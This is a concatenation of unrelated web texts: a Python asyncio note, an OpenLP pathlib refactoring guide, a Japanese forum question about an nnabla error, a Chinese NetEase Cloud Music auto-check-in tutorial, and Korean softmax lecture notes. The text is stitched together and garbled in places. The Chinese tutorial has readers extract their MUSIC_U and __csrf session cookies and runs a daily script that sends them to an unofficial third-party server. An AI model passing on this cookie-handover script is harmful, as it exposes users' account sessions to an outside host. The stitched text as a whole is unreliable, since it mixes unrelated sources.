year={2020}
}
Contact
Please contact [email protected] for any question, feedback or request.
Downloads last month
0
|
July 30, 2020
Important keywords #
Asynchronous IO (async IO)Language-agnostic paradigm (model)
coroutineA Python (sort of generator function)
async/awaitPython keywords used to defined a coroutine
asyncioPython package that provides an API for running/managing coroutines
Coroutine #
A coroutine allows a function to pause before returning or indirectly call another coroutine for some time, for example:
import asyncio import time async def count(n): print(f"n is {n}") await asyncio.sleep(n) print(f"Returning from {n}") async def main(): await asyncio.gather(count(1), count(2), count(3)) m = time.perf_counter() asyncio.run(main()) elapsed = time.perf_counter() - m print(f"Executed in {elapsed:0.2f} seconds.")
n is 1n is 2n is 3Returning from 1Returning from 2Returning from 3Executed in 3.01 seconds.
|
OpenLP currently uses string objects to represent file and directory paths. From Python 3.4 pathlib, a new module introducing a Path object, was included in the standard library.
Switching to this Path object will allow us to deal with file paths on different platforms easier. In some cases it also reduces LOC and in my opinion makes the code cleaner and easier to read.
Naming Convention
At this point I would like to propose a naming convention.
All variables that reference a Path object end with '_path' i.e (save_path, media_path)
Variables that reference a string representation of a part of a path end with '_name' i.e (file_name, directory_name)
Lists of the afore mentioned type shall be plurals, i.e
save_paths, media_paths
file_names, directory_names
The Path object
Here are some examples to help get started using pathlib.
All of these code samples are from work I've done on refactoring OpenLP to use Path objects. (Some have been simplified to provide a concise example)
Creating paths
The existing way using strings:
path = os.path.join(AppLocation.get_section_data_path('themes'), 'theme_name')
Using a Path object. (Note once OpenLP has been converted to using Path objects AppLocation.get_section_data_path will return a Path object)
# Using the Path constructor (If you're creating a Path object from scratch)
path = Path(AppLocation.get_section_data_path('themes'), 'theme_name')
# Creating a new Path object from an existing Path object
path = AppLocation.get_section_data_path('themes') / 'theme_name'
# -- or --
path = AppLocation.get_section_data_path('themes').joinpath('theme_name')
The '/' is used to join Paths, or a Path and a string object regardless if the operating system uses forward or backward slashes.
Formatting strings
Nothing special needs to be done when using a Path object as an argument to the format method of a string.
from pathlib import PurePosixPath, PureWindowsPath
'Directory: {path}'.format(path=PurePosixPath('test', 'path')) == 'Directory: test/path'
'Directory: {path}'.format(path=PureWindowsPath('test', 'path')) == 'Directory: test\\path'
Using Paths
The Path object is divided in to ConcretePath objects (ones who's methods access the file system) and PurePath objects (ones who's methods provide their functionally with out accessing the file system). These are objects are sub classed to provide the Path object. See the pathlib documentation for more details.
PurePath Methods
These are methods that do not access the file system, consequently, PurePosixPath can be imported in Windows and PureWindowsPath can be imported on Posix systems. The same cannot be said for the ConcretePath objects
name (File / Directory Names)
Used to access the name of the last part of the path (anything after the last slash)
With os.path:
filename = os.path.split(self.theme.background_filename)[1]
# -- or --
filename = os.path.basename(self.theme.background_filename)
With pathlib:
file_name = self.theme.background_file_path.name
Note: See Path object removes the trailing/ for a differencebetween how os.path and pathlib.Path handle trailing slashes
with_name (File / Directory Names)
Same as above, but allows the file / directory name to be easily changed when using a Path object
With os.path:
data_folder_backup_path = data_folder_path + '-' + timestamp
With pathlib:
data_folder_backup_path = data_folder_path.with_name(data_folder_path.name + '-' + timestamp)
suffix (File extensions)
In pathlib the extension is known (correctly) as the suffix.
With os.path:
extension = os.path.splitext(file_name)[1].lower()
With pathlib:
extension = file_path.suffix.lower()
with_suffix (File extensions)
As with file names, pathlib makes replacing the extension/suffix a breeze.
With os.path:
if os.path.splitext(file_name)[1] == '':
file_name += '.osz'
else:
ext = os.path.splitext(file_name)[1]
file_name.replace(ext, '.osz')
With pathlib:
file_path.with_suffix('.osz')
stem (File name with out extension)
pathlib.stem gets the file name with out extensions.
This involved a two step process with os.path of 'splitting' the name and then 'splitting' the extension.
With os.path:
path_file_name = self.file_name()
path, file_name = os.path.split(path_file_name)
base_name = os.path.splitext(file_name)[0]
With pathlib:
base_name = self.file_name().stem
Parent
Get the parent directory name.
With os.path:
last_dir = os.path.split(file)[0]
# -- or --
last_dir = os.path.dirname(file)
With pathlib:
last_dir_path = file_path.parent
ConcretePath Methods
Concrete Path methods preform reads or writes to the file system. Because of this the ConcretePath implementations can only be used on the system for which they were written for.
Stat
With os.path:
os.path.getsize(file_name) == 0
With pathlib:
file_path.stat().st_size == 0
With os.path:
image_date = os.stat(file_path).st_mtime
With pathlib:
image_date = file_path.stat().st_mtime
Exists
Does the path exist regardless if it is a file or directory.
With os.path:
if os.path.exists(thumb_path):
With pathlib:
if thumb_path.exists():
is_dir
Is the path a directory?
With os.path:
if os.path.isdir(local_file):
With pathlib:
if local_path.is_dir():
is_file
Is the path a file?
With os.path:
if not os.path.isfile(text_file):
With pathlib:
if not text_file_path.is_file():
iterdir
Returns a list of absolute paths, so iterating through results and joins are not required.
With os.path:
listing = os.listdir(local_file)
for file_name in listing:
files.append(os.path.join(local_file, file_name))
With pathlib:
file_paths = local_path.iterdir()
When using os.walk, and only expecting results from the source directory (i.e. no sub directories).
With os.path:
for files in os.walk(source):
for name in files[2]:
With pathlib:
for file_path in source_path.iterdir():
open
With os.path:
with open(filename, 'rb') as detect_file:
With pathlib:
with file_path.open('rb') as detect_file:
read_text
Open the file and read out the text.
With os.path:
song_file = open(self.import_source, 'rt', encoding='utf-8-sig')
file_content = song_file.read()
song_file.close()
# -- or --
with open(self.import_source, 'rt', encoding='utf-8-sig') as song_file:
file_content = song_file.read()
With pathlib:
file_content = self.import_source.read_text(encoding='utf-8-sig')
write_text
fn = open(notes_file, mode='wt', encoding='utf-8')
fn.write(note)
fn.close()
# -- or --
with open(notes_file, mode='wt', encoding='utf-8') as fn:
fn.write(note)
notes_path.write_text(note)
resolve
Wrappers and Utility functions
Gotchas
No such thing as a Falsey path
Perhaps the biggest annoyance of the Path object is that the Path object is assumed to be relative to the current working directory. If its instantiated with out any arguments, or an empty string, its still a object with a path relative to the current working directory.
Path() == Path('') == Path('.')
Previously in OpenLP there would be cases where we did things like:
file_name = ''
# some code ...
if file_name:
We could do this because an empty string is a Falsey value. However all Path objects are Truthy
To work round this empty path variables should be defined as None. This leads to extra effort when handling things like QFileDialogs, as they return an empty string if the user cancels the dialog box. Meaning we can't just wrap the return value with a Path object. Instead the return needs evaluating and if equal to a Falsey value we need to return None.
file_name = ''
# some code ..
if file_name == '':
file_path = None
else:
file_path = Path(file_name)
Of course it goes the other way too. We cannot just call str() on a variable which stores a Path object, as it could be None, and str(None) == 'None'. So something like the following is needed.
file_path = None
# some code ..
if file_path is None:
file_name = ''
else:
file_name = str(file_path)
To simplify this I have implemented a version of both the above code samples as utilities path_to_str and str_to_path.
Path object removes the trailing \
Another feature to look out for is that the Path object removes the trailing slash. For example:
str(Path('a/')) == 'a'
Path('a/') == Path('a')
This kind of makes sense. Drop in to a terminal and try the following (should work on Windows too)
:~$ cd Documents/:~/Documents$ cd ..:~$ cd Documents:~/Documents$
However this leads to some inconsistencies between the os.path module and the pathlib module. Here are some (but not exhaustive examples):
a_name = 'user/desktop'
b_name = 'user/desktop/'
a_path = Path(a_name)
b_path = Path(b_name)
(a_path == b_path) == True
# Get the file / directory name
os.path.basename(a_name) == 'desktop'
os.path.basename(b_name) == ''
a_path.name == 'desktop'
# Get the parent directory
os.path.dirname(a_name) == 'user'
os.path.dirname(b_name) == 'user/desktop'
a_path.parent == Path('user')
Saving Paths
To save a Path in a cross platform way, you should consider using relative Paths, i.e. relative to the service file, theme file, data folder and so on.
To facilitate the above a couple modules have been implemented.
openlp.core.common.json
This module has been designed with the future in mind, whilst implementing the minimum required for the current use. With the addition of a function to register custom objects this module will be able to en/decode objects that the json standard library cannot. The Path object has been re-implemented (openlp.core.common.path) to provide methods to facilitate this. Saving a path is as simple as:
import json
from openlp.core.common.path import Path
from openlp.core.common.json import OpenLPJsonDecoder, OpenLPJsonEncoder
orig_path = Path('/', 'home', 'user', 'desktop', 'file.ext')
json_encoded_path = json.dumps(orig_path, cls=OpenLPJsonEncoder)
json_encoded_path == '{"__Path__": ["/", "home", "user", "desktop", "file.ext"]}'
new_path = json.loads(json_encoded_path, cls=OpenLPJsonDecoder)
new_path == Path('/home/user/desktop/file.ext')
When the json methods are passed with the additional arguments, the arguments are passed to the json en/decode methods of the custom object. The custom Path object accepts a 'base_path' parameter, which allows it to automatically convert the Path to a relative path (if possible) for storage. The above code then becomes:
import json
from openlp.core.common.path import Path
from openlp.core.common.json import OpenLPJsonDecoder, OpenLPJsonEncoder
base_path = Path('/', 'home', 'user', 'desktop')
orig_path = Path('/', 'home', 'user', 'desktop', 'file.ext')
json_encoded_path = json.dumps(orig_path, cls=OpenLPJsonEncoder, base_path=base_path)
json_encoded_path == '{"__Path__": ["file.ext"]}'
See how json_encoded_path is now relative to the base path? Any relative paths stored in this way will automatically be converted to an absolute path if a base_path parameter is also supplied when the json object is decoded:
differnet_base_path = Path('/', 'home', 'annother_user', 'desktop')
new_path = json.loads(json_encoded_path, cls=OpenLPJsonDecoder, base_path=differnet_base_path )
new_path == Path('/home/annother_user/desktop/file.ext')
Whilst PureWindowsPath accepts forward and back slashes, PurePoisixPath only supports forward slashes.
For ultimate portability, we should save the value of parts on the Path object. That way they can be used in a Path object constructor. See the example that follows:
orig_path = Path ('user/desktop')
orig_path.parts == ('user', 'desktop')
orig_parts = orig_path.parts
new_path = Path(*orig_parts)
new_path == Path('user/desktop')
SQLAlchemy
A 'PathType' (openlp.core.lib.db) has also been created to wrap the json en/decoding of path objects to allow them to be stored as plain text in the database. As OpenLP uses 'open' formats such as OpenLyrics to export data, it is expected that the sqlite databases are kept internal. For this reason Paths stored using the 'PathType' are made relative to the data folder. This allows for easy changing of the data path.
For an example of the 'PathType' in use see the song and image pugins' database code.
|
ERROR: type should be string, got "https://teratail.com/questions/315284#reply-439497 \nURLを参考にして、プログラムを実行すると、以下のエラー文がでて推論できません。考えられる原因はなんでしょうか。 \nエラー文\nFile \"C:\\Users\\username\\Desktop\\output\\capture.py\", line 106, in <module>\ny = network(x, t)\nFile \"C:\\Users\\username\\Desktop\\output\\capture.py\", line 16, in network\nh = PF.binary_connect_affine(x, name='BinaryConnectAffine')\nTypeError: binary_connect_affine() missing 1 required positional argument: 'n_outmaps'\nプログラム\nimport nnabla as nn\nimport nnabla.functions as F\nimport nnabla.parametric_functions as PF\nfrom nnabla.utils.data_iterator import data_iterator_csv_dataset \nimport os \nimport cv2\nfrom datetime import datetime\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\ndef network(x, y, test=False):\n # Input:x -> 3,250,250\n # BinaryConnectAffine -> 100\n h = PF.binary_connect_affine(x,(100), name='BinaryConnectAffine')\n # BatchNormalization\n h = PF.batch_normalization(h, (1,), 0.9, 0.0001, not test, name='BatchNormalization')\n # ReLU\n h = F.relu(h, True)\n # BinaryConnectAffine_2\n h = PF.binary_connect_affine(h,(100), name='BinaryConnectAffine_2')\n # BatchNormalization_2\n h = PF.batch_normalization(h, (1,), 0.9, 0.0001, not test, name='BatchNormalization_2')\n # ReLU_2\n h = F.relu(h, True)\n # BinaryConnectAffine_3\n h = PF.binary_connect_affine(h,(100), name='BinaryConnectAffine_3')\n # BatchNormalization_3\n h = PF.batch_normalization(h, (1,), 0.9, 0.0001, not test, name='BatchNormalization_3')\n # ReLU_3\n h = F.relu(h, True)\n # BinaryConnectAffine_4 -> 26\n h = PF.binary_connect_affine(h, (26), name='BinaryConnectAffine_4')\n # BatchNormalization_4\n h = PF.batch_normalization(h, (1,), 0.9, 0.0001, not test, name='BatchNormalization_4')\n # Softmax\n h = F.softmax(h)\n # CategoricalCrossEntropy -> 1\n #h = F.categorical_cross_entropy(h, y)\n return h\nclass_names = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\ncap = cv2.VideoCapture(0) # 任意のカメラ番号に変更する\nnew_dir_path = \"./realtime/\"\nos.makedirs(new_dir_path, exist_ok=True)\n #カメラスタート\nwhile True:\n ret, frame = cap.read()\n cv2.imshow(\"camera\", frame)\n k = cv2.waitKey(1)&0xff # キー入力を待つ\n if k == ord('p'): \n # 「p」キーで画像を保存\n date = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n path = new_dir_path + date +\".png\"\n cv2.imwrite(path, frame) \n image_gs = cv2.imread(path)\n path = new_dir_path + date +\".png\"\n dst = cv2.resize(image_gs,(250,250))\n cv2.imwrite(path, dst)\n f = pd.DataFrame(columns=[\"x:data\",\"y:data\"])\n xdata = path\n ydata = 0\n new_name = pd.Series([xdata,ydata],index=f.columns)\n f = f.append(new_name, ignore_index=True)\n f.to_csv('valu.csv',index=False,header = True )\n test_data = data_iterator_csv_dataset(\"C:\\\\Users\\\\username\\\\Desktop\\\\output\\\\valu.csv\",1,shuffle=False,normalize=True) \n path = new_dir_path + \"test\" +\".png\"\n cv2.imwrite(path, frame) \n image_gs = cv2.imread(path)\n path = new_dir_path + date +\".png\"\n dst = cv2.resize(image_gs,(250,250))\n cv2.imwrite(path, dst)\n f = pd.DataFrame(columns=[\"x:data\",\"y:data\"])\n xdata = path\n ydata = 0\n new_name = pd.Series([xdata,ydata],index=f.columns)\n f = f.append(new_name, ignore_index=True)\n f.to_csv('valu.csv',index=False,header = True )\n test_data = data_iterator_csv_dataset(\"C:\\\\Users\\\\username\\\\Desktop\\\\output\\\\valu.csv\",1,shuffle=False,normalize=True) \n #ネットワークの構築\n nn.clear_parameters()\n x = nn.Variable((1,3,250,250))\n t = nn.Variable((1,1))\n y = network(x, t)\n nn.load_parameters('C:\\\\Users\\\\username\\\\Desktop\\\\output\\\\yubidata.files\\\\20210113_161413\\\\results.nnp')\n print(\"load model\")\n for i in range(test_data.size):\n x.d, t.d = test_data.next()\n y.forward()\n print(y.d[0]) \n print(np.argmax(y.d[0]))\n print(class_names[np.argmax(y.d[0])])\n elif k == ord('q'):\n # 「q」キーが押されたら終了する\n break\n # キャプチャをリリースして、ウィンドウをすべて閉じる\ncap.release()\ncv2.destroyAllWindows()\n\nネットワーク構造\n学習結果\n学習時に使った画像のパス AからZのフォルダ\nCSVファイルの中身 変更後\n気になる質問をクリップする\nクリップした質問は、後からいつでもマイページで確認できます。\nまたクリップした質問に回答があった際、通知やメールを受け取ることができます。\nクリップを取り消します\n良い質問の評価を上げる\n以下のような質問は評価を上げましょう\n質問内容が明確\n自分も答えを知りたい\n質問者以外のユーザにも役立つ\n評価が高い質問は、TOPページの「注目」タブのフィードに表示されやすくなります。\n質問の評価を上げたことを取り消します\n評価を下げられる数の上限に達しました\n評価を下げることができません\n1日5回まで評価を下げられます\n1日に1ユーザに対して2回まで評価を下げられます\n質問の評価を下げる\nteratailでは下記のような質問を「具体的に困っていることがない質問」、「サイトポリシーに違反する質問」と定義し、推奨していません。\nプログラミングに関係のない質問\nやってほしいことだけを記載した丸投げの質問\n問題・課題が含まれていない質問\n意図的に内容が抹消された質問\n過去に投稿した質問と同じ内容の質問\n広告と受け取られるような投稿\n評価が下がると、TOPページの「アクティブ」「注目」タブのフィードに表示されにくくなります。\n質問の評価を下げたことを取り消します\nこの機能は開放されていません\n評価を下げる条件を満たしてません\n15分調べてもわからないことは、teratailで質問しよう!\nただいまの回答率 88.34%\n質問をまとめることで、思考を整理して素早く解決\nテンプレート機能で、簡単に質問をまとめられる"
|
前言:
非常感谢大神分享的脚本,使得可以达到全自动效果!
手动打卡地址:
教程开始:
1,抓取网易云cookie MUSIC_U 和 __csrf
首先登录网易云音乐网页版
登录完成后按F12,也可以右键找到检查(审查元素), 点击Network,然后刷新一下网页,一般在最顶端可以找到一个名为: music.163.com , 然后单击点进去
然后点击Headers ,往下滑,可以看到 Cookie,后面跟着一大串字母数字,然后找到最后面两段, MUSIC_U= 和 __csrf ,保存好这两个的值,马上用上。
2.使用计划任务实现每天自动签到
#by 妖火 id34976
import requests
def start():
cookies = {
'MUSIC_U': '这里替换成你自己网易云账号对应的MUSIC_U',
'__csrf': '这里替换成你自己网易云账号对应的__csrf',
}
res = requests.post('http://wyy.52blog.cf:88/api.php?do=sign', cookies=cookies)
resp = requests.get('http://wyy.52blog.cf:88/api.php?do=daka', cookies=cookies)
print(res.text,resp.text)
def main_handler(event, context):
return start()
if __name__ == '__main__':
start()
将之前我们获取到的MUSIC_U和__csrf填进去,记得结尾的分号“;”去掉。
记得结尾的分号“;”去掉
在任意目录新建一个wy.py文件,将我们修改好的脚本复制进去。
执行:
python3 wy.py
接下来就是设定一下计划任务了。
crontab -e #设定任务
11 1 * * * python3 /root/wy.py
crontab -l #查看任务
上面是设定为每天,凌晨1:11自动打卡,需要自定义参考crontab命令
第二种自动签到打卡方式
1:配置云函数
打开腾讯云,进入云函数(登录):
或者:登录腾讯云之后,我们直接进控制台直接去搜云函数,进入到云函数的配置界面
登录好后点击:新建—输入函数名称(随意)—运行环境(python3.6)—创建方式(空白函数)—下一步
点击下一步后直接划到下面编辑代码区域(将之前修改好的代码复制进来):
然后点击完成,完成后点击函数配置—编辑—设置一下运行角色,如图所示:
(ps:如果没有运行角色,可以登录腾讯云控制台然后找到云函数进入,此时会提示你授权,授权即可)
先来测试下看看好了没
ok(可以去网易云音乐检查是否成功),接下来去设置触发方式,让它每天自动完成
点击触发方式—然后添加触发方式,第四项cron表达式3 5 0,1,2,3 * * * *#每天凌晨0,1,2,3,点5分3秒执行一次
因为如果同时很多人一起调用,可能会失败!所以多设置0,1,2,3点都执行一下。所以建议大家设置下时间。
然后点击完成.到这已经设置完毕了
可使用以下:
3 5 0,1,2,3 * * * * #每天凌晨0,1,2,3,点5分3秒执行一次
更多设置参考腾讯云cron文档
版权声明:版权归
所有,转载请注明出处!
如果博客出现404或链接失效,请留言或者联系博主修复!
|
2020/01/28
여러 개의 클래스가 있을 때, 그 것을 예측하는 방법을
Multinomial Classification
이라고 하며, 그 중에 가장 많이 사용되는Softmax Classification에 대하여 배워보도록 한다.
본격적으로 Softmax Classification에 대해 이야기를 시작하기 전에 지난 시간까지의 이론적인 내용들을 짚고 넘어가도록 하자.
기본적으로 출발은 H(X) = WX라는 Linear한 Hypothesis와 함께하였다.이러한 WX와 같은 형태의 단점은 리턴하는 값이 어떠한 실수의 값 (100, -10 … 등)이 되기 때문에 둘 중 하나를 선택하는 Binary Classification을 수행하려 할 때적합하지 않았다. 그래서 이를 해결하기 위한 방안으로 z = H(X)라고 하고,어떠한 g(z)라는 함수를 통해 앞서 언급한 큰 실수 값들을 압축하여 0 또는 1혹은 그 사이의 값으로 표현할 수 있도록 하는 것이었다.이를 적합하게 표현한 g(z)를 sigmoid function 혹은 logistic function이라고 부른다고 하였다.
이를 우측 하단에 보이는 그림과 함께 다시 정리하여 설명하면,X라는 입력이 있고 연산 유닛에서 W를 가지고 Linear한 계산 과정을 거친 뒤에나오는 값이 z이며, sigmoid라는 함수에 입력하게 된다.이를 통과하고 난 뒤에는 어떠한 값이 나오게 되는데, 이는 0과 1 사이에 해당하는 값이고이를 통상적으로 Y hat이라고 부른다. 흔히 Y는 실제 데이터에 해당하고예측(predict)값에 해당하는 것을 구분하여 부르기 위해 Y hat이라고 한다.
Logistic classification이 하는 일을 직관적으로 살펴보기 위해 예를 들면x1, x2라는 값을 가지고 있고, 우리가 분류해야 할 네모와 X 모양의 두 데이터가 있다고할 때, Logistic classification을 한다 혹은 W를 학습시킨다 는 말은이 두 모양의 데이터를 구분하는 어떠한 선을 찾아낸다는 이야기이다.
자, 그러면 이 아이디어를 그대로 multinomial classification에 적용할 수 있다.multinomial이라는 것은 여러 개의 클래스가 있다는 것이다. 지금까지 자주 언급되고사용되던 예제의 맥락을 그대로 확장하여 살펴보도록 하자.
Multinomial 이라는 것은 여러 개의 클래스가 있다는 의미이다. 데이터가 위의 표와 같은 형태로 주어졌을 때 그래프에 나타내면 대략 아래와 같다.
이처럼 A,B,C 세 개로 구분되는 Multinomial 형태를 갖더라도 이전까지 우리가 알고 있던 Binary Classification만으로도 구현이 가능하다.
위의 그림에서와 같이 A인지 아닌지, B인지 아닌지, C인지 아닌지의 3개의 경우로 나누어구분할 수 있고, 앞서 본 도식을 각각 적용하여 3개의 독립된 Classifier들을 가지고구현이 가능하다고 할 수 있는 것이다.
이 3개의 Classifier들을 실제로 구현할 때에는 그림에서와 같은 수식을 사용하게 되는데이는 우리가 알고 있던 W * X = H(X)와 같은 형태를 갖는 행렬 곱의 수식이다.우리는 3개의 Classifier들을 구하려고 하기 때문에 각각 독립된 벡터를 가지고3번의 계산을 수행해내야 한다. 그런데 이렇게 독립적으로 계산하면 계산하는 데에도,구현하는 데에도 복잡하게 느껴지는데, 우리는 행렬 곱셈을 알고 있기 때문에하나로 표현할 수가 있다.
W에 해당하는 벡터들을 나란히 하나로 묶어 위와 같이 각 첨자를 A,B,C에 해당하게바꾸어주고 9 * 9 행렬로 표현한 뒤, 동일한 곱셈 연산을 수행하게 되어 얻게 되는 결과가바로 우리가 원했던 Ha(X), Hb(X), Hc(X)에 해당하는 가설에 해당하게 된다.이렇게 3개의 독립된 Classifier를 각각 구현해야 하지만 하나의 벡터로 한 번에처리가 가능하고 이 것은 세 개의 독립된 Classification처럼 동작하게 된다.
다시 말해서, 사진의 오른쪽 도식과 같이 세 개의 Classifier들을 따로따로 나누어 표현하고 연산하는 것은 불필요하고 복잡하므로 행렬 연산을 단일화하여 간단히 나타내고 계산을 쉽게 할 수 있다는 것이다.
그런데 위처럼 가설 함수를 하나의 벡터로 한 데 묶어 구했다고 하더라도, 이 값들은 결국 이전에 언급한 것처럼 실수 값에 해당한다. 그 값의 크기 따라 정답을 도출해낼 수는 있겠지만, 이는 우리가 알던 Logistic의 방식이 아니기 때문에 Sigmoid function을 적용하여 0에서 1사이의 값이 나오도록 해야 한다.
위 사진에서 A,B,C 각각에 해당하는 Classifier들은 어떠한 과정을 거쳐서0과 1사이의 값을 도출하게 되고, 결론적으로 한 벡터 안의 이 모든 클래스들의결과 값의 합이 1이 되게 하는 이 방식이 Softmax classification이다.
위 그림이 바로 Softmax function이다. 가설 함수 결과값의 행렬 벡터를(예시에서는 3개이지만 이 행렬의 행의 개수는 n개일 것이다.) 이 함수에 입력하면,앞서 말한 것과 같은 0과 1사이의 값이고 모든 값의 합이 1이 되는 확률 값이 될 것이다.
이렇게 Softmax function을 거쳐 변환된 확률 값들을 바탕으로One-Hot Encoding이라는 절차를 거쳐서 (실습 시간에 다룰 것이다.)가장 큰 값만 1로 바꾸고 나머지를 0으로 변경하여 하나의 클래스를 채택하는결과를 얻게 된다.
지금까지의 과정을 통해 예측하는 모델 (Hypothesis)를 구해보았고이제 예측 값이 실제의 값과 얼마나 차이를 나타내는가에 대한 Cost function을 설계하는 방법에 대해 알아보도록 하겠다.
Softmax Classification 을 수행하는 과정에서 Cost function을 구할 때,Cross-Entropy라는 함수를 사용하여 도출하게 된다.위 그림에서의 S는 Softmax function을 거쳐 도출된 확률 값이자, 달리 말하면가설 함수의 결과값에 해당하므로 예측 값에 해당하며 도입부에 언급된 Y hat이라 할 수 있다.L은 Label 값이라는 의미이며, 바로 이전 사진에서 본 것처럼 One-hot Encoding과정을 거쳐 변환된 실제 값, 즉 Y 값에 해당한다.
이제 이 수식이 어떻게 정상적으로 동작하고 적용이 가능한지에 대해서 알아보자.
- 기호의 위치를 바꾸어 곱셈 기호를 명시적으로 표현하면 사진에서 제목 아래에 보이는공식처럼 표현할 수 있다. 이 곱셈 기호는 (필자도 이 강의를 들으며 처음 알게 되었는데)요소별 곱셈(element-wise multiplication) 이라고 불리는 곱셈 방식인데, 피연산자인행렬에서 각 요소별로 연산을 수행하는 방식이다. 사진에서 원 안에 점을 찍어 표현한 기호가바로 그 곱셈 기호이다. 아다마르 곱 (Hadamard product)이라고도 불린다고 한다.
여기서 -log() 형태의 표현은 Logistic Classification 에서 도입한 것처럼우측의 그래프로 나타낼 수 있음을 알 수 있다. 간단한 예를 통해서 이 공식을 증명해보면사진의 하단부에 보이는 것과 같다. A, B 두 클래스를 갖는다고 가정하면L은 실제 값 벡터에해당하며 B를 채택한다는 것을 알 수 있다.
초록색 글씨로 표현된 예측 벡터는 B를 예측하고 있으며공식에 대입하게 되면 L에 해당하는 [0, 1]벡터와 Y hat에 해당하는 예측 벡터에-log를 취한 것에 곱을 수행하는 구조가 되는 것을 확인할 수 있는데,이 때 -log를 취하게 되면 우측 그래프를 통해 알 수 있듯이 0에 해당하는 값은 무한대가 되고,1에 해당하는 값은 0을 갖게 된다. 따라서 결과는 [inf, 0]이 되며, 이들을element-wise 곱셈을 수행하게 되면 [0, 0]이 되고, 공식의 가장 왼 쪽에 있는 sigma,즉 각 요소를 모두 합해주게 되면 0이라는 결과를 얻게 된다. 이 값이 구하려는 Cost가 된다.
보라색 글씨로 표현된 예측 벡터는 A를 예측하고 있으며잘못된 예측을 하고 있다. 이를 공식에 대입하게 되면 L에 해당하는 벡터와 Y hat에 해당하는예측 벡터에 -log를 취한 것을 마찬가지로 element-wise 곱셈을 수행한다.마찬가지로 그래프를 통해 알 수 있듯, (간단한 예이므로 직관적으로 반대라고 생각하면 되겠다.)1에 해당하는 값은 0을 갖게 되고, 0에 해당하는 값은 무한대를 갖게 되어 [0, inf]라는 결과를얻게 됨을 알 수 있다. 이를 L = [0, 1]과 각 요소를 곱셈의 결과는 [0, inf]가 되고,최종 결과는 무한대가 됨을 알 수 있다. 따라서 잘못된 예측을 하는 가설은 무한대가 된다는 것이다.
반대의 경우도 마찬가지이다.
위의 예를 이어서 실제 Label L이 A를 채택하는 결과 [1, 0]를 가지고 있고 예측 벡터는동일하다고 할 때, 이제는 초록색이 잘못된 예측을 하고 있으므로 무한대의 값을 갖고,보라색이 올바른 예측을 하고 있으므로 0의 cost 값을 갖게 되는 것을 알 수 있다.
지금까지 우리가 살펴본 Cross Entropy cost function은 지난 강의에서 우리가 배웠던Logistic Classification의 Cost function과 완전히 동일하다.Logistic cost에서의 C는 Cost를 의미하고, Cross entropy의 D는 Distance를의미한다. 또한 Logistic cost의 H(x)와 y 값은 예측값(가설)과 실제 값을 의미하므로Cross entropy의 Softmax 값과 Label 값과 일맥상통한다.
교수님께서 우측에 나타나는 공식 또한 동일한 논리를 가지고 있다고 설명하시면서 그 이유는 숙제로 남겨두겠다며 생각해보라고 말씀하셨는데, 지금까지 배운 것을 토대로 생각해봤을 때, 사실상 Cross entropy의 공식은 Logistic cost 공식이 압축되어 있다고 생각할 수 있으며 (
H(x) = S,y = L이라고 했으므로) 단지 차이점이라고 하자면 Cross entropy에서는 각 클래스들에 해당하는 값이 한 벡터에 묶여있기 때문에 cost 값을sum해주는 과정이 포함되는 것 뿐이라고 생각된다.
지금까지는 하나의 Training set에 대한 cost function을 설명한 내용이었고, 여러 개의 Training Data Set이 있다면 각 Set의 Cost를 모두 더하여 평균을 내주면 전체에 대한 Cost/Loss function을 정의할 수 있게 된다.
항상 그랬듯이 마지막 단계로 직전까지 논했던 Cost를 최소화 시키는 값,(여기에서는 W에 해당하는 벡터)를 찾아내는 알고리즘을 적용해야 하는데 항상 등장하던Gradient Descent를 마찬가지로 적용하게 될 것이다.
어떤 점에서 시작하더라도 경사면을 따라 내려가서 반드시 최소값을 찾을 수 있음을보장하는 것이 이 알고리즘이며 경사면을 뜻하는 것이 그래프에서의 기울기이다.기울기를 구하기 위해서는 수식을 미분해야 하는데, 진도를 거듭하면서 수식이 복잡해졌기때문에 미분 과정은 다루지 않는다. 다만 기억해야 할 것은 사진에서 보이는 것처럼learning rate 값인 alpha 만큼씩 내려가면서 위치를 업데이트 시켜 기울기를 구하며최소값을 찾아가는 과정이라는 것이다.
실습 강좌에서는 Softmax Classifier를 TensorFlow를 이용하여 직접 구현해본다. 그 전에, 이론 시간에 학습했던 내용을 한번 더 요약하여 짚고 넘어간다.
Softmax function이라는 것은 여러개의 클래스를 예측할 때 매우 유용하다.이 것을 다루기 이전까지의 Binary Classification은 0이냐 1이냐와 같은 예측만이가능했는데, 사실 실생활에서는 두 개보다는 여러개를 예측하는 경우가 더 많을 것이다.따라서 N개의 예측할 거리가 있을 때, 이 Softmadx Classification을 사용하는것이 좋다.
시작은 항상 동일하게 주어진 X 값에, 학습시킬 W를 곱해서 값을 만들어낸다.그런데 이렇게 만들어진 값은 Score에 해당하는 실수 값에 불과하므로 우리는 이것을Softmax라고 불리는 함수를 통과시키면 확률 값이 결과로 나오게 된다.만약 각 Label을 A, B, C라고 한다면 A가 0.7, B가 0.2, C가 0.1 과 같이확률로 표현할 수 있게 된다. 그리고 또 하나의 특징은 여기서 모든 클래스의 확률을 합치면이 값은 반드시 1이 될 것이다.
그러면 이것을 TensorFlow로 어떻게 구현할 것인가?
TensorFlow를 이용하여 Softmax Classification을 구현하는 것은 어렵지 않다.그림에 나와 있는 것처럼 실수 예측 값 수식을 그대로 옮겨 작성해주면 되는데,(이 Scores에 해당하는 값들을 다른 말로 Logit이라고 부르기도 한다.)주어진 X-data와 W 행렬을 TensorFlow의 Matrix Multiplication 내장 함수인tf.matmul을 이용하여 곱셈을 수행한 뒤 b(bias) 값을 더해주면 된다. 그리고이 가설을 통해 보기에 매우 복잡한 Softmax function을 통과시키는 방법은 마찬가지로TensorFlow의 내장 함수인 tf.nn.softmax 함수를 이용하여 Logit값을 전달해주면우리가 원하는 확률 값으로 구성된 벡터를 얻을 수 있고, 이 것이 우리의 Hypothesis이다.
